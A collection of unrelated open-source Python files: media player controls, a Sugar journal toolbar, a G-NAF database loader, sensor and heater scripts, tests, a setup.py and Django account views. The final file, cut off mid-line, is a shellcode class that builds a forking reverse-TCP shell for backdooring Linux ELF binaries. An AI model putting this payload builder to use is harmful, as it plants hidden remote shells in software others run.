def on_frame_next(self):
if not self.loaded:
return
self.player.frame_step()
def on_frame_prev(self):
if not self.loaded:
return
self.player.frame_back_step()
def on_5_next(self):
if not self.loaded:
return
self.player.seek(5 * self.frame_dur, "relative", "exact")
def on_5_prev(self):
if not self.loaded:
return
self.player.seek(-5 * self.frame_dur, "relative", "exact")
def on_go_start(self):
if not self.loaded:
return
self.player.seek(0, "absolute", "exact")
def on_go_end(self):
if not self.loaded:
return
self.player.seek(self.duration, "absolute", "exact")
def on_go_in(self):
if not self.loaded:
return
self.seek(self.mark_in)
def on_go_out(self):
if not self.loaded:
return
self.seek(self.mark_out or self.duration)
def on_mark_in(self, value=False):
if not self.loaded:
return
if value:
if isinstance(value, TimecodeWindow):
value = value.get_value()
self.seek(min(max(value, 0), self.duration))
self.mark_in = value
self.setFocus()
else:
self.mark_in = self.position
self.region_bar.update()
def on_mark_out(self, value=False):
if not self.loaded:
return
if value:
if isinstance(value, TimecodeWindow):
value = value.get_value()
self.seek(min(max(value, 0), self.duration))
self.mark_out = value
self.setFocus()
else:
self.mark_out = self.position
self.region_bar.update()
def on_clear_in(self):
if not self.loaded:
return
self.mark_in = 0
self.region_bar.update()
def on_clear_out(self):
if not self.loaded:
return
self.mark_out = 0
self.region_bar.update()
def on_clear_marks(self):
if not self.loaded:
return
self.mark_out = self.mark_in = 0
self.region_bar.update()
def seek(self, position):
if not self.loaded:
return
if isinstance(position, TimecodeWindow):
position = position.get_value()
self.setFocus()
self.player.seek(position, "absolute", "exact")
def on_pause(self):
if not self.loaded:
return
self.player["pause"] = not self.player["pause"]
def force_pause(self):
if not self.loaded:
return
if not self.player["pause"]:
self.player["pause"] = True
def update_marks(self):
i = self.mark_in
o = self.mark_out or self.duration
self.mark_in_display.set_value(i)
self.mark_out_display.set_value(o)
io = o - i + self.frame_dur
if io > 0:
self.io_display.set_value(io)
else:
self.io_display.set_value(0)
self.prev_mark_in = self.mark_in
self.prev_mark_out = self.mark_out
def on_display_timer(self):
if not self.loaded:
return
if self.position != self.prev_position and self.position is not None:
self.position_display.set_value(self.position)
self.timeline.setValue(int(self.position * 100))
self.prev_position = self.position
if self.duration != self.prev_duration and self.position is not None:
self.duration_display.set_value(self.duration)
self.timeline.setMaximum(int(self.duration * 100))
self.prev_duration = self.duration
if (
self.mark_in != self.prev_mark_in
or self.mark_out != self.prev_mark_out
or self.duration_changed
):
self.update_marks()
self.duration_changed = False
|
immstudios/firefly
|
proxyplayer/videoplayer.py
|
Python
|
gpl-3.0
| 9,818
|
# Copyright (C) 2007, 2011, One Laptop Per Child
# Copyright (C) 2014, Ignacio Rodriguez
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import logging
import os
import statvfs
from gettext import gettext as _
from gi.repository import GObject
from gi.repository import Gio
from gi.repository import GLib
from gi.repository import Gtk
from gi.repository import Gdk
import cPickle
import xapian
import json
import tempfile
import shutil
from sugar3.graphics.radiotoolbutton import RadioToolButton
from sugar3.graphics.palette import Palette
from sugar3.graphics import style
from sugar3 import env
from sugar3 import profile
from jarabe.journal import model
from jarabe.journal.misc import get_mount_icon_name
from jarabe.journal.misc import get_mount_color
from jarabe.view.palettes import VolumePalette
_JOURNAL_0_METADATA_DIR = '.olpc.store'
def _get_id(document):
"""Get the ID for the document in the xapian database."""
tl = document.termlist()
try:
term = tl.skip_to('Q').term
if len(term) == 0 or term[0] != 'Q':
return None
return term[1:]
except StopIteration:
return None
def _convert_entries(root):
"""Convert entries written by the datastore version 0.
The metadata and the preview will be written using the new
scheme for writing Journal entries to removable storage
devices.
- entries that do not have an associated file are not
converted.
- if an entry has no title we set it to Untitled and rename
the file accordingly, taking care of creating a unique
filename
"""
try:
database = xapian.Database(os.path.join(root, _JOURNAL_0_METADATA_DIR,
'index'))
except xapian.DatabaseError:
logging.exception('Convert DS-0 Journal entries: error reading db: %s',
os.path.join(root, _JOURNAL_0_METADATA_DIR, 'index'))
return
metadata_dir_path = os.path.join(root, model.JOURNAL_METADATA_DIR)
if not os.path.exists(metadata_dir_path):
try:
os.mkdir(metadata_dir_path)
except EnvironmentError:
logging.error('Convert DS-0 Journal entries: '
'error creating the Journal metadata directory.')
return
for posting_item in database.postlist(''):
try:
document = database.get_document(posting_item.docid)
except xapian.DocNotFoundError, e:
logging.debug('Convert DS-0 Journal entries: error getting '
'document %s: %s', posting_item.docid, e)
continue
_convert_entry(root, document)
def _convert_entry(root, document):
try:
metadata_loaded = cPickle.loads(document.get_data())
except cPickle.PickleError, e:
logging.debug('Convert DS-0 Journal entries: '
'error converting metadata: %s', e)
return
if not ('activity_id' in metadata_loaded and
'mime_type' in metadata_loaded and
'title' in metadata_loaded):
return
metadata = {}
uid = _get_id(document)
if uid is None:
return
for key, value in metadata_loaded.items():
metadata[str(key)] = str(value[0])
if 'uid' not in metadata:
metadata['uid'] = uid
filename = metadata.pop('filename', None)
if not filename:
return
if not os.path.exists(os.path.join(root, filename)):
return
if not metadata.get('title'):
metadata['title'] = _('Untitled')
fn = model.get_file_name(metadata['title'],
metadata['mime_type'])
new_filename = model.get_unique_file_name(root, fn)
os.rename(os.path.join(root, filename),
os.path.join(root, new_filename))
filename = new_filename
preview_path = os.path.join(root, _JOURNAL_0_METADATA_DIR,
'preview', uid)
if os.path.exists(preview_path):
preview_fname = filename + '.preview'
new_preview_path = os.path.join(root,
model.JOURNAL_METADATA_DIR,
preview_fname)
if not os.path.exists(new_preview_path):
shutil.copy(preview_path, new_preview_path)
metadata_fname = filename + '.metadata'
metadata_path = os.path.join(root, model.JOURNAL_METADATA_DIR,
metadata_fname)
if not os.path.exists(metadata_path):
(fh, fn) = tempfile.mkstemp(dir=root)
os.write(fh, json.dumps(metadata))
os.close(fh)
os.rename(fn, metadata_path)
logging.debug('Convert DS-0 Journal entries: entry converted: '
'file=%s metadata=%s',
os.path.join(root, filename), metadata)
class VolumesToolbar(Gtk.Toolbar):
__gtype_name__ = 'VolumesToolbar'
__gsignals__ = {
'volume-changed': (GObject.SignalFlags.RUN_FIRST, None,
([str])),
'volume-error': (GObject.SignalFlags.RUN_FIRST, None,
([str, str])),
}
def __init__(self):
Gtk.Toolbar.__init__(self)
self._mount_added_hid = None
self._mount_removed_hid = None
button = JournalButton()
button.connect('toggled', self._button_toggled_cb)
self.insert(button, 0)
button.show()
self._volume_buttons = [button]
self.connect('destroy', self.__destroy_cb)
GLib.idle_add(self._set_up_volumes)
def __destroy_cb(self, widget):
volume_monitor = Gio.VolumeMonitor.get()
volume_monitor.disconnect(self._mount_added_hid)
volume_monitor.disconnect(self._mount_removed_hid)
def _set_up_volumes(self):
self._set_up_documents_button()
volume_monitor = Gio.VolumeMonitor.get()
self._mount_added_hid = volume_monitor.connect('mount-added',
self.__mount_added_cb)
self._mount_removed_hid = volume_monitor.connect(
'mount-removed',
self.__mount_removed_cb)
for mount in volume_monitor.get_mounts():
self._add_button(mount)
def _set_up_documents_button(self):
documents_path = model.get_documents_path()
if documents_path is not None:
button = DocumentsButton(documents_path)
button.props.group = self._volume_buttons[0]
button.set_palette(Palette(_('Documents')))
button.connect('toggled', self._button_toggled_cb)
button.show()
position = self.get_item_index(self._volume_buttons[-1]) + 1
self.insert(button, position)
self._volume_buttons.append(button)
self.show()
def __mount_added_cb(self, volume_monitor, mount):
self._add_button(mount)
def __mount_removed_cb(self, volume_monitor, mount):
self._remove_button(mount)
def _add_button(self, mount):
logging.debug('VolumeToolbar._add_button: %r', mount.get_name())
if os.path.exists(os.path.join(mount.get_root().get_path(),
_JOURNAL_0_METADATA_DIR)):
logging.debug('Convert DS-0 Journal entries: starting conversion')
GLib.idle_add(_convert_entries, mount.get_root().get_path())
button = VolumeButton(mount)
button.props.group = self._volume_buttons[0]
button.connect('toggled', self._button_toggled_cb)
button.connect('volume-error', self.__volume_error_cb)
position = self.get_item_index(self._volume_buttons[-1]) + 1
self.insert(button, position)
button.show()
self._volume_buttons.append(button)
if len(self.get_children()) > 1:
self.show()
def __volume_error_cb(self, button, strerror, severity):
self.emit('volume-error', strerror, severity)
def _button_toggled_cb(self, button):
if button.props.active:
self.emit('volume-changed', button.mount_point)
def _get_button_for_mount(self, mount):
mount_point = mount.get_root().get_path()
for button in self.get_children():
if button.mount_point == mount_point:
return button
logging.error('Couldnt find button with mount_point %r', mount_point)
return None
def _remove_button(self, mount):
button = self._get_button_for_mount(mount)
self._volume_buttons.remove(button)
self.remove(button)
self.get_children()[0].props.active = True
if len(self.get_children()) < 2:
self.hide()
def set_active_volume(self, mount):
button = self._get_button_for_mount(mount)
button.props.active = True
class BaseButton(RadioToolButton):
__gsignals__ = {
'volume-error': (GObject.SignalFlags.RUN_FIRST, None,
([str, str])),
}
def __init__(self, mount_point):
RadioToolButton.__init__(self)
self.mount_point = mount_point
self.drag_dest_set(Gtk.DestDefaults.ALL,
[Gtk.TargetEntry.new('journal-object-id', 0, 0)],
Gdk.DragAction.COPY)
self.connect('drag-data-received', self._drag_data_received_cb)
def _drag_data_received_cb(self, widget, drag_context, x, y,
selection_data, info, timestamp):
object_id = selection_data.get_data()
metadata = model.get(object_id)
file_path = model.get_file(metadata['uid'])
if not file_path or not os.path.exists(file_path):
logging.warn('Entries without a file cannot be copied.')
self.emit('volume-error',
_('Entries without a file cannot be copied.'),
_('Warning'))
return
try:
model.copy(metadata, self.mount_point)
except IOError, e:
logging.exception('Error while copying the entry. %s', e.strerror)
self.emit('volume-error',
_('Error while copying the entry. %s') % e.strerror,
_('Error'))
class VolumeButton(BaseButton):
def __init__(self, mount):
self._mount = mount
mount_point = mount.get_root().get_path()
BaseButton.__init__(self, mount_point)
self.props.icon_name = get_mount_icon_name(mount,
Gtk.IconSize.LARGE_TOOLBAR)
# TODO: retrieve the colors from the owner of the device
self.props.xo_color = get_mount_color(self._mount)
def create_palette(self):
palette = VolumePalette(self._mount)
# palette.props.invoker = FrameWidgetInvoker(self)
# palette.set_group_id('frame')
return palette
class JournalButton(BaseButton):
def __init__(self):
BaseButton.__init__(self, mount_point='/')
self.props.icon_name = 'activity-journal'
self.props.xo_color = profile.get_color()
def create_palette(self):
palette = JournalButtonPalette(self)
return palette
class JournalButtonPalette(Palette):
def __init__(self, mount):
Palette.__init__(self, _('Journal'))
grid = Gtk.Grid(orientation=Gtk.Orientation.VERTICAL,
margin=style.DEFAULT_SPACING,
row_spacing=style.DEFAULT_SPACING)
self.set_content(grid)
grid.show()
self._progress_bar = Gtk.ProgressBar()
grid.add(self._progress_bar)
self._progress_bar.show()
self._free_space_label = Gtk.Label()
self._free_space_label.set_alignment(0.5, 0.5)
grid.add(self._free_space_label)
self._free_space_label.show()
self.connect('popup', self.__popup_cb)
def __popup_cb(self, palette):
stat = os.statvfs(env.get_profile_path())
free_space = stat[statvfs.F_BSIZE] * stat[statvfs.F_BAVAIL]
total_space = stat[statvfs.F_BSIZE] * stat[statvfs.F_BLOCKS]
fraction = (total_space - free_space) / float(total_space)
self._progress_bar.props.fraction = fraction
self._free_space_label.props.label = _('%(free_space)d MB Free') % \
{'free_space': free_space / (1024 * 1024)}
class DocumentsButton(BaseButton):
def __init__(self, documents_path):
BaseButton.__init__(self, mount_point=documents_path)
self.props.icon_name = 'user-documents'
self.props.xo_color = profile.get_color()
|
icarito/sugar
|
src/jarabe/journal/volumestoolbar.py
|
Python
|
gpl-3.0
| 13,211
|
import logging, os
import psycopg2
# settings
database_name = 'postgres_database'
user = 'postgres_user'
password = 'some_password_here_lol'
port = 5432
host = 'postgres_host_normally_localhost'
path_to_gnaf_data = '/path/to/gnaf/data/'
# setup
logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s', level=logging.DEBUG)
def get_folder_path(support_text, absolute_path, search_path, search_name, test_name):
if not search_path and search_name in test_name:
logging.debug(support_text + absolute_path)
return absolute_path
else:
return search_path
def load_sql_file_into_db(file_path):
file_ref = open(file_path, "r").read()
db_cursor.execute(file_ref)
db_connection.commit()
try:
db_connection = psycopg2.connect(database=database_name, user=user, password=password, host=host, port=port)
db_cursor = db_connection.cursor()
logging.info("Step 0 of 5 : Bootstrapping started...")
gnaf_parent_path = ''
extras_path = ''
table_creation_scripts_path = ''
example_view_creation_scripts_path = ''
table_creation_script_path = ''
foreign_key_script_path = ''
example_view_script_path = ''
authority_code_path = ''
standard_data_path = ''
gnaf_name = 'G-NAF '
table_creation_script_folder_name = 'GNAF_TableCreation_Scripts'
table_creation_script_name = 'create_tables_ansi.sql'
foreign_key_script_name = 'add_fk_constraints.sql'
authority_code_name = 'Authority Code'
standard_data_name = 'Standard'
psv_file_suffix = "_psv.psv"
views_script_folder_name = 'GNAF_View_Scripts'
example_view_script_name = 'address_view.sql'
SQL_STATEMENT = """ COPY %s FROM STDIN WITH CSV HEADER DELIMITER AS '|'"""
# find sub folders needed
for dirname, dirnames, filenames in os.walk(path_to_gnaf_data):
for subdirname in dirnames:
absolute_path = os.path.join(dirname, subdirname)
gnaf_parent_path = get_folder_path("G-NAF parent folder: ", absolute_path, gnaf_parent_path, gnaf_name, subdirname)
table_creation_scripts_path = get_folder_path("Table creation scripts folder: ", absolute_path, table_creation_scripts_path, table_creation_script_folder_name, subdirname)
example_view_creation_scripts_path = get_folder_path("Example View creation scripts folder: ", absolute_path, example_view_creation_scripts_path, views_script_folder_name, subdirname)
authority_code_path = get_folder_path("Authority Code folder: ", absolute_path, authority_code_path, authority_code_name, subdirname)
standard_data_path = get_folder_path("Standard data folder: ", absolute_path, standard_data_path, standard_data_name, subdirname)
# find table/fk creation scripts
for dirname, dirnames, filenames in os.walk(table_creation_scripts_path):
for filename in filenames:
absolute_path = os.path.join(table_creation_scripts_path, filename)
if not table_creation_script_path and table_creation_script_name in filename:
table_creation_script_path = absolute_path
logging.debug("Table creation script: " + table_creation_script_path)
if not foreign_key_script_path and foreign_key_script_name in filename:
foreign_key_script_path = absolute_path
logging.debug("Foreign key script: " + foreign_key_script_path)
# find views creation script
for dirname, dirnames, filenames in os.walk(example_view_creation_scripts_path):
for filename in filenames:
absolute_path = os.path.join(example_view_creation_scripts_path, filename)
if not example_view_script_path and example_view_script_name in filename:
example_view_script_path = absolute_path
logging.debug("Example views script: " + example_view_script_path)
logging.info("Step 0 of 5 : Bootstrapping finished!")
logging.info("Step 1 of 5 : Creating Schema started...")
load_sql_file_into_db(table_creation_script_path)
logging.info("Step 1 of 5 : Creating Schema finished!")
logging.info("Step 2 of 5 : Loading Authority Code data started...")
for dirname, dirnames, filenames in os.walk(authority_code_path):
num_files = str(len(filenames))
for index, filename in enumerate(filenames):
absolute_path = os.path.join(authority_code_path, filename)
authority_code_prefix = "Authority_Code_"
authority_code_suffix = psv_file_suffix
table_name = filename.replace(authority_code_prefix, "")
table_name = table_name.replace(authority_code_suffix, "")
logging.info("Importing file " + str(index + 1) + " of " + num_files + ": " + filename + " -> " + table_name)
db_cursor.copy_expert(sql=SQL_STATEMENT % table_name, file=open(absolute_path))
db_connection.commit()
logging.info("Step 2 of 5 : Loading Authority Code data finished!")
logging.info("Step 3 of 5 : Loading Standard data started...")
for dirname, dirnames, filenames in os.walk(standard_data_path):
num_files = str(len(filenames))
for index, filename in enumerate(filenames):
absolute_path = os.path.join(standard_data_path, filename)
standard_data_suffix = psv_file_suffix
table_name = filename.split('_', 1)[-1]
table_name = table_name.replace(standard_data_suffix, "")
logging.info("Importing file " + str(index + 1) + " of " + num_files + ": " + filename + " -> " + table_name)
db_cursor.copy_expert(sql=SQL_STATEMENT % table_name, file=open(absolute_path))
db_connection.commit()
logging.info("Step 3 of 5 : Loading Standard data finished!")
logging.info("Step 4 of 5 : Creating Foreign Key relationships creation started...")
load_sql_file_into_db(foreign_key_script_path)
logging.info("Step 4 of 5 : Creating Foreign Key relationships creation finished!")
logging.info("Step 5 of 5 : Creating example views creation started...")
load_sql_file_into_db(example_view_script_path)
logging.info("Step 5 of 5 : Creating example views creation finished!")
db_cursor.close()
db_connection.close()
except Exception as exception:
logging.error("Exception occurred: " + str(exception))
|
ajosephau/psma-gnaf-loader
|
main.py
|
Python
|
gpl-3.0
| 6,393
|
#!/usr/bin/python
# Internet de las Cosas - http://internetdelascosas.cl
#
# Descripcion : Programa que permite obtener la lectura de un sensor DHT11
# Lenguaje : Python
# Autor : Jose Zorrilla <jzorrilla@iot.cl>
# Dependencias : Libreria de Adafruit https://github.com/adafruit/Adafruit_Python_DHT
# Web : http://internetdelascosas.cl/
# Importa las librerias necesarias
import time
import datetime
import Adafruit_DHT
# Log file
log_path = "/var/log/iot/"
# Configuracion del tipo de sensor DHT
sensor = Adafruit_DHT.DHT11
# Configuracion del puerto GPIO al cual esta conectado (GPIO 23)
pin = 23
# Escribe un archivo log en log_path con el nombre en el formato yyyy-mm-dd_dht.log
def write_log(text):
log = open(log_path + datetime.datetime.now().strftime("%Y-%m-%d") + "_dht.log","a")
line = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") + " " + text + "\n"
log.write(line)
log.close()
# Intenta ejecutar las siguientes instrucciones, si falla va a la instruccion except
try:
# Ciclo principal infinito
while True:
# Obtiene la humedad y la temperatura desde el sensor
humedad, temperatura = Adafruit_DHT.read_retry(sensor, pin)
# Si obtiene una lectura del sensor la registra en el archivo log
if humedad is not None and temperatura is not None:
write_log("DHT Sensor - Temperatura: %s" % str(temperatura))
write_log("DHT Sensor - Humedad: %s" % str(humedad))
else:
write_log('Error al obtener la lectura del sensor')
# Duerme 10 segundos
time.sleep(10)
# Se ejecuta en caso de que falle alguna instruccion dentro del try
except Exception,e:
# Registra el error en el archivo log y termina la ejecucion
write_log(str(e))
|
luckyz/raspberry
|
dht11/dht11_examples/dht_log.py
|
Python
|
gpl-3.0
| 1,700
|
#!/usr/bin/env python
import server
import time
from Sensoria.stereotypes.TimeControlData import TimeControlData
from Sensoria.stereotypes.InstantMessageData import InstantMessageData
class TemperatureSensor (server.TemperatureSensor):
def __init__ (self):
super (TemperatureSensor, self).__init__ ("HD", "Heater Temperature")
class HeaterController (server.ControlledRelayActuator):
def __init__ (self):
super (HeaterController, self).__init__ ("HC", "Heater Controller")
#TL1:10 TL2:18 TL3:21
class HeaterTimer (server.TimedActuator):
def __init__ (self):
super (HeaterTimer, self).__init__ ("HT", "Heater Timer")
initData = TimeControlData ()
initData.unmarshal ("PMO:000000001000000003222110 PTU:000000001000000003222110 PWE:000000001000000003222110 PTH:000000001000000003222110 PFR:000000001000000003222111 PSA:000000000322222222222211 PSU:000000000322222222222210")
ok, msg = self.write (initData)
print msg
assert ok
class HeaterSettings (server.ValueSetActuator):
def __init__ (self):
super (HeaterSettings, self).__init__ ("HS", "Heater Settings")
self.levels = [10, 18, 21]
@property
def values (self):
return self.levels
@values.setter
def values (self, v):
self.levels = v[0:3]
hd = TemperatureSensor ()
hc = HeaterController ()
ht = HeaterTimer ()
hs = HeaterSettings ()
listener = server.CommandListener ("HeatingSystem")
listener.register_sensor (hd)
listener.register_sensor (hc)
listener.register_sensor (ht)
listener.register_sensor (hs)
listener.start ()
while True:
time.sleep (1)
|
SukkoPera/Arduino-Sensoria
|
python/server3.py
|
Python
|
gpl-3.0
| 1,544
|
# Case Conductor is a Test Case Management system.
# Copyright (C) 2011 uTest Inc.
#
# This file is part of Case Conductor.
#
# Case Conductor is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Case Conductor is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Case Conductor. If not, see <http://www.gnu.org/licenses/>.
from unittest2 import TestCase
from mock import patch
class FakeSettings(object):
def __init__(self, **kwargs):
self.accessed = []
self.failed = []
self.values = {}
self.values.update(kwargs)
def __getattr__(self, attr):
try:
val = self.values[attr]
except KeyError:
self.failed.append(attr)
raise AttributeError
else:
self.accessed.append(attr)
return val
class ConfigurationTest(TestCase):
@property
def cls(self):
from ccui.core.conf import Configuration
return Configuration
def test_default(self):
conf = self.cls(SOME_SETTING="some val")
settings = FakeSettings()
with patch("ccui.core.conf.settings", settings):
val = conf.SOME_SETTING
self.assertEqual(val, "some val")
self.assertEqual(settings.failed, ["SOME_SETTING"])
def test_no_default(self):
from django.core.exceptions import ImproperlyConfigured
conf = self.cls()
settings = FakeSettings()
with patch("ccui.core.conf.settings", settings):
with self.assertRaises(ImproperlyConfigured):
conf.SOME_SETTING
self.assertEqual(settings.failed, ["SOME_SETTING"])
def test_exists(self):
conf = self.cls()
settings = FakeSettings(SOME_SETTING="a val")
with patch("ccui.core.conf.settings", settings):
val = conf.SOME_SETTING
self.assertEqual(val, "a val")
self.assertEqual(settings.accessed, ["SOME_SETTING"])
def test_default_is_fallback(self):
conf = self.cls(SOME_SETTING="default val")
settings = FakeSettings(SOME_SETTING="set val")
with patch("ccui.core.conf.settings", settings):
val = conf.SOME_SETTING
self.assertEqual(val, "set val")
self.assertEqual(settings.accessed, ["SOME_SETTING"])
|
mozilla/caseconductor-ui
|
tests/core/test_conf.py
|
Python
|
gpl-3.0
| 2,735
|
"""setuptools based packaging and installation module.
Defines the project properties, as well as a special command to build a
standalone executable, by using PyInstaller.
Run with --help to see available options.
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
import sys
import distutils
import subprocess
from amtt.version import __version__ as amtt_version
here = path.abspath(path.dirname(__file__))
class BuildStandaloneExeCommand(distutils.cmd.Command):
"""
Custom command to build standalone executable using PyInstaller.
Invoke by executing:
python setup.py build_standalone
"""
description = 'build standalone executable with PyInstaller'
user_options = []
def initialize_options(self):
"""Set default values for user options."""
def finalize_options(self):
"""Post-process user options."""
def run(self):
"""Run command."""
sep = ';' if sys.platform == 'win32' else ':'
command = ' '.join([
'pyinstaller',
' --onefile',
' --add-data amtt/ui/icon64x64.png{sep}amtt/ui'.format(sep=sep),
' --add-data amtt/ui/icon64x64.gif{sep}amtt/ui'.format(sep=sep),
' --add-data amtt/exporter/isograph/emitter/xml/template-2.1.xml'
'{sep}amtt/exporter/isograph/emitter/xml'.format(sep=sep),
' --hidden-import pyexcel_xls.xls'
' amtt/main.py',
' -i resources/icon.ico',
' -n amtt_{plat}-{ver}'.format(plat=sys.platform,
ver=amtt_version),
])
self.announce('Building standalone executable with PyInstaller',
level=distutils.log.INFO)
subprocess.check_call(command, shell=True)
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='amtt',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version=amtt_version,
description='Availability Modelling Translation Toolkit',
long_description=long_description,
# The project's main homepage.
url='https://github.com/errikos/amtt',
# Author details
author='Ergys Dona',
author_email='ergys.dona@cern.ch',
# Choose your license
license='GPL-3.0',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 4 - Beta',
# Indicate who your project is intended for
'Intended Audience :: Manufacturing',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Physics',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
# What does your project relate to?
keywords='availability engineering model translation toolkit',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['docs']),
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires=[
'networkx',
'pydotplus',
'pyexcel',
'pyexcel-xls',
'sliding-window',
'lxml',
],
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
package_data={
'amtt.ui': ['icon64x64.png', 'icon64x64.gif'],
'amtt.exporter.isograph.emitter.xml': ['template-2.1.xml'],
},
# List additional groups of dependencies here (e.g. documentation
# dependencies). You can install these using the following syntax:
# $ pip install -e .[docs]
extras_require={
'docs': ['Sphinx', 'sphinx-rtd-theme'],
'build': ['PyInstaller'],
},
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
entry_points={
'console_scripts': [
'amtt=amtt.main:main',
'amtt-gui=amtt.main:ui_main',
],
},
# Provide custom command for building standalone executable
cmdclass={
'build_standalone': BuildStandaloneExeCommand,
},
)
|
errikos/amtt
|
setup.py
|
Python
|
gpl-3.0
| 5,374
|
from django.core.urlresolvers import reverse
from django.core.mail import send_mail
from django.shortcuts import render, redirect
from django.contrib.auth.models import User
from django.contrib.auth.decorators import login_required
from .models import ActivateCode
import uuid
import os
from django.http import HttpResponse
import datetime
def register(request):
error = ""
if request.method == "GET":
return render(request, "user_register.html")
else:
username = request.POST['username'].strip()
email = request.POST['email'].strip()
password = request.POST['password'].strip()
re_password = request.POST['re_password'].strip()
if not username or not password or not email:
error = "任何字段都不能为空"
if password != re_password:
error = "两次密码不一致"
if User.objects.filter(username=username).count() > 0:
error = "用户已存在"
if User.objects.filter(email=email).count() > 0:
error = "该邮箱已注册"
if not error:
user = User.objects.create_user(username=username,
email=email, password=password)
user.is_active = False
user.save()
new_code = str(uuid.uuid4()).replace("-", "")
expire_time = datetime.datetime.now() + datetime.timedelta(days=2)
code_record = ActivateCode(owner=user, code=new_code,
expire_timestamp=expire_time)
code_record.save()
activate_link = "http://%s%s" % (request.get_host(), reverse(
"user_activate", args=[new_code]))
send_mail('[python论坛]激活邮件',
'您的激活链接为: %s' % activate_link,
'huyuanxuan@163.com',
[email],
fail_silently=False)
else:
return render(request, "user_register.html", {"error": error})
return HttpResponse("请查收邮件激活帐户!")
def activate(request, code):
query = ActivateCode.objects.filter(code=code,
expire_timestamp__gte=datetime.datetime.now())
if query.count() > 0:
code_record = query[0]
code_record.owner.is_active = True
code_record.owner.save()
return HttpResponse("激活成功")
else:
return HttpResponse("激活失败")
@login_required
def upload_avatar(request):
if request.method == "GET":
return render(request, "upload_avatar.html")
else:
profile = request.user.userprofile
avatar_file = request.FILES.get("avatar", None)
if not avatar_file:
return HttpResponse("未选择文件")
file_name = request.user.username + avatar_file.name
if avatar_file.size > 50000:
return HttpResponse("图片大小不能超过500KB")
file_path = os.path.join("/usr/share/userres/avatar/", file_name)
with open(file_path, 'wb+') as destination:
for chunk in avatar_file.chunks():
destination.write(chunk)
url = "http://res.myforum.com/avatar/%s" % file_name
profile.avatar = url
profile.save()
return redirect("/")
|
littleghosty/forum
|
mysite/usercenter/views.py
|
Python
|
gpl-3.0
| 3,333
|
'''
Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
Copyright (C) 2013,2014, Joshua Pitts
License: GPLv3
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
See <http://www.gnu.org/licenses/> for a copy of the GNU General
Public License
Currently supports win32/64 PE and linux32/64 ELF only(intel architecture).
This program is to be used for only legal activities by IT security
professionals and researchers. Author not responsible for malicious
uses.
'''
import struct
import sys
class linux_elfI32_shellcode():
"""
Linux ELFIntel x32 shellcode class
"""
def __init__(self, HOST, PORT, e_entry, SUPPLIED_SHELLCODE=None):
#could take this out HOST/PORT and put into each shellcode function
self.HOST = HOST
self.PORT = PORT
self.e_entry = e_entry
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.shellcode = ""
self.stackpreserve = "\x90\x90\x60\x9c"
self.stackrestore = "\x9d\x61"
def pack_ip_addresses(self):
hostocts = []
if self.HOST is None:
print "This shellcode requires a HOST parameter -H"
sys.exit(1)
for i, octet in enumerate(self.HOST.split('.')):
hostocts.append(int(octet))
self.hostip = struct.pack('=BBBB', hostocts[0], hostocts[1],
hostocts[2], hostocts[3])
return self.hostip
def returnshellcode(self):
return self.shellcode
def reverse_shell_tcp(self, CavesPicked={}):
"""
Modified metasploit linux/x64/shell_reverse_tcp shellcode
to correctly fork the shellcode payload and contiue normal execution.
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
self.shellcode1 = "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x07"
#will need to put resume execution shellcode here
self.shellcode1 += "\xbd"
self.shellcode1 += struct.pack("<I", self.e_entry)
self.shellcode1 += "\xff\xe5"
self.shellcode1 += ("\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68")
#HOST
self.shellcode1 += self.pack_ip_addresses()
self.shellcode1 += "\x68\x02\x00"
#PORT
self.shellcode1 += struct.pack('!H', self.PORT)
self.shellcode1 += ("\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"
